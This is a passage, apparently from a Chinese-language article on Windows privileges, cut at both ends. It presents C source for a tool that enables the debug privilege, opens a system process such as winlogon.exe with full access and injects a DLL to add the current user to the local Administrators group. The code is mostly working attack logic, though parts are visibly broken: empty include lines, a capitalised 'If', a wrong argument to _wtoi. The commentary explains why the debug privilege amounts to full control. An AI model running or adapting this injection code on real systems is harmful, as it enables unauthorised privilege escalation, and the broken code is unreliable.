dMeToAdministrators.exe procid, 其中procid为（1）记下的进程ID （3）签退再签到，运行用户管理器，即可发现自己已在Administrators本地组中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用户名称*/

void GetCurrentUser(wchar_t *szName)
{
  HANDLE hProcess, hAccessToken;
  wchar_t InfoBuffer[1000],szAccountName[200],
  szDomainName[200];
  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
  DWORD dwInfoBufferSize,dwAccountSize = 200,
  dwDomainSize = 200;
  SID_NAME_USE snu;

  hProcess = GetCurrentProcess();

  OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

  GetTokenInformation(hAccessToken,TokenUser,
  InfoBuffer,
      1000, &dwInfoBufferSize);

  LookupAccountSid(NULL, pTokenUser->User.Sid,
  szAccountName,
      &dwAccountSize,szDomainName, &dwDomainSize, &snu);
  wcscpy(szName,szDomainName);
  wcscat(szName,L"\\");
  wcscat(szName,szAccountName);
}

/* EnablePrivilege启用自己的“调试程序”的用户权限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_ADJUST_PRIVILEGES, &hToken))
  return FALSE;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, szPrivName,
&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp,
sizeof(tp), NULL, NULL);
return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
LPSTR lpszCmdLine, int
nCmdShow)
{
INT argc;
WCHAR **argv;
argv = CommandLineToArgvW(GetCommandLineW(),
&argc);
INT nProcessId = -1;
if (argc!=2){
  wprintf(L"usage %s pid", argv[0]);
  return 1;
}
nProcessId = _wtoi(argv);
printf("%d\n",nProcessId);
---- /*要成功执行ContinueProcessWithDll，要对winlogon.exe等进程的进程句柄有读写存储器内容和创建线程的权限，EnablePrivilege使本进程有这样的权利。*/

if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
  printf("AdjustTokenPrivilege Fail %u\n",
(UINT)GetLastError());
  return 1;
}
HANDLE  gNewHandle =
OpenProcess(PROCESS_ALL_ACCESS
, TRUE, nProcessId);
if (!gNewHandle){
  printf("OpenProcess Fail %u\n",
(UINT)GetLastError());
  return 1;
}
  wchar_t szName[100];
GetCurrentUser(szName);
SetAccountName(szName);
If (!ContinueProcessWithDll(gNewHandle,
L"c:\\temp\\admin.dll")) {
  printf("ContinueProcessWithDll failed %u",
(UINT)GetLastError());
  return 3;
}
return 0;
}
---- 因为“调试程序”的用户权限缺省情况下仅赋予给管理员，因此并不会造成安全漏洞。但该程序揭示出“调试程序”的用户权限其实是至高无上的用户权限，只能